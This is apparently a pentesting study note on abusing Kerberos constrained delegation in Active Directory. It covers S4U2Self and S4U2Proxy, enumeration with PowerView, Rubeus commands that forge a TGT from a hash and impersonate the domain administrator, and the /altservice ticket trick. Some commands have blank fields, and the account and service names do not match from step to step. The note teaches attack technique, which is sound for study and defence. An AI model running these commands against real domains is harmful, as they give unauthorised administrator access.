## Theory
The main goal of Kerberos delegation is to solve the double-hop issue as well.
While unconstrained delegation allowed the service to perform authentication to anything in the domain, constrained delegation limits the delegation scope.
Microsoft released two extensions for this feature:
1. [S4U2Self](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/02636893-7a1f-4357-af9a-b672e3e3de13)
2. [S4U2Proxy](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/bde93b0e-f3c9-4ddf-9f44-e1453be7af5a)

Constrained delegation is configured on the coputer with the _msds-allowedtodelegateto_ property  by specifying the SPNs the current object is allowed constrained delegation against.

If a front-end service does not use Kerberos authentication and the back-end service does, it needs to be able to request a TGS to the frontend service from a KDC on behalf of the user who is authenticating against it.

The S4U2Self extension enables this if the TRUSTED_TO_AUTH_FOR_DELEGATION value is present in the _useraccountcontrol_ property.
The S4U2proxy extension requests a service ticket for the backend service on behalf of a user.(can also be obtained directly by the user with a forwardable tgs if kerberos auth is enabled for the front-end service)


## Exploitation
We can enumerate accounts with constrained delegation with:
```powershell
Get-DomainUser -TrustedToAuth
```

The three important aspects of the output will be:
1. Constrained delegation enabled on the victim account
2. msds-allowedtodelegate property containing the SPN.
3. The _TRUSTED_TO_AUTH_FOR_DELEGATION_ value in the _useraccountcontrol_ property.

To exploit this, we can request a service ticket for the services listed in the _msds-allowedtodelegateto_ field as any user in the domain.

Note that we do not need to execute in the context of the _IISSvc_ account in order to exploit the account.
However, we do need the password or the hash for the account.

We can use the following command if we have the hash to generate a TGT for IISSvc account:
```powershell
.\Rubeus.exe hash /password:August25

.\Rubeus.exe asktgt /user:svc_file /domain:.com /rc4:56c3d4377f4a791098b6ffdfc711c229
```

With the Base-64 encoded TGT, we can now invoke the S4U extensions, again, with Rubeus:
```Powershell
.\Rubeus.exe s4u /ticket: /impersonateuser:administrator /msdsspn:cifs/file02.denkiair.com /ptt
```

This way, we obtained a usable service ticket for the MSSQL service instance on CDC01. We can now use the sql server to gain code execution.

## Extra
Interestingly, when the TGS is returned from the KDC, the server name is encrypted, but not the service name.
This means we can modify the service name within the TGS in memory and obtain access to a different service on the same host.
We can do this through Rubeus with the /altservice option.
```Powershell
.\Rubeus.exe s4u /ticket:doIE+jCCBPag... /impersonateuser:administrator /msdsspn:mssqlsvc/cdc01.prod.corp1.com:1433 /altservice:CIFS /ptt
```

if the SPN configured for constrained delegation only uses the service and host name like www/cdc01.prod.corp1.com, we could modify the TGS to access any service on the system.